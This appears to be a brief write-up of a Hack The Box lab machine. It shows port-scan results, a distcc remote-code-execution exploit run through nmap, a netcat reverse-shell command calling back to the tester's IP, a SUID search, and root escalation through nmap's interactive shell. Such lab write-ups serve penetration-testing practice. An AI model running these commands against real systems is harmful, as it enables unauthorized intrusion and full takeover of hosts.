source: https://www.hackthebox.eu/home/machines/profile/1
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args=”distcc-cve2004-2687.cmd=’nc 10.10.14.2 443 -e /bin/bash’”
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
No comments:
Post a Comment